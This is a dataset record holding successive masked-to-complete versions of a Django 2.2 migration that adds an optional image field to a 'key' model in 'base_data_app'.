normal
|
{
"blob_id": "ad53b100a1774f5429278379302b85f3a675adea",
"index": 8986,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('base_data_app', '0008_key_keyslider')]\n operations = [migrations.AddField(model_name='key', name='image', field\n =models.ImageField(null=True, upload_to='key', verbose_name=\n 'Картинка'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('base_data_app', '0008_key_keyslider')]\n operations = [migrations.AddField(model_name='key', name='image', field\n =models.ImageField(null=True, upload_to='key', verbose_name=\n 'Картинка'))]\n",
"step-5": "# Generated by Django 2.2 on 2019-05-13 06:57\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('base_data_app', '0008_key_keyslider'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='key',\n name='image',\n field=models.ImageField(null=True, upload_to='key', verbose_name='Картинка'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.